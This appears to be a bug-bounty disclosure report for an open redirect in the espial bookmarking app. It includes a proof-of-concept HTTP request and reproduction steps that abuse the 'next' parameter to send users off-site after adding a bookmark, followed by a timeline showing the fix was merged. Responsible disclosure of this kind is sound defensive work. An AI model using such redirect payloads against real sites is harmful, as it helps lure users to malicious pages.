Open Redirect in jonschoning/espial

Valid

Reported on

Sep 25th 2021


Description

Open Redirect at add url with parameter ?next=

Proof of Concept

// PoC.request
POST /api/add HTTP/2
Host: esp.ae8.org
Cookie: _SESSION=t0+3lyA0gi4m/WOulD20ZJpY+2nW6ePHcVdc+I8Q+XV5W2b9qkCTm9/L9zYKNYg+rG7YmGyRg7SSZnGGG8NcZlrvXly7uPAUFtXaU+NzgjFoAwV8VSKA6KjB3JKwVxarCcSfW519/RjCDJJpq0ZBguQqPm4qF+dbAdIzAiP5XogmlVajF+8k9+UqxvpbGkZ6e3VGBdhOi44wL/AfySUfkxpro+yEVfeeBrLi3wefGrt4/SyZYivwQql8QocZQ/J2+p5UegTvYByqQlD8obT1p4BrmFecBq07y1KGpXDw+u76m4zF3NPw2pUJVKMD1rolqu3r+c/Z7htvP4A=; XSRF-TOKEN=rK2UKn5OcYHo0nsPw8jOP5YR99BDb84wsCXxyaQ0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Xsrf-Token: rK2UKn5OcYHo0nsPw8jOP5YR99BDb84wsCXxyaQ0
Content-Type: application/json
Content-Length: 183
Origin: https://esp.ae8.org
Referer: https://esp.ae8.org/add?next=https://google.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"url":"http://test.com","toread":null,"title":"Home - Test.com","time":null,"tags":null,"slug":null,"selected":null,"private":false,"description":"test","bid":null,"archiveUrl":null}

Step to Reproduct

Access add url with url : https://esp.ae8.org/add?next=https://google.com

After create success it will redirect to google.com

Impact

This functionality is not restricted to relative URLs within the application and could be leveraged by an attacker to fool an end user into believing that a malicious URL they were redirected to is valid.

We have contacted a member of the jonschoning/espial team and are waiting to hear back 2 months ago
Jon Schoning validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jon Schoning confirmed that a fix has been merged on db00a1 2 months ago
The fix bounty has been dropped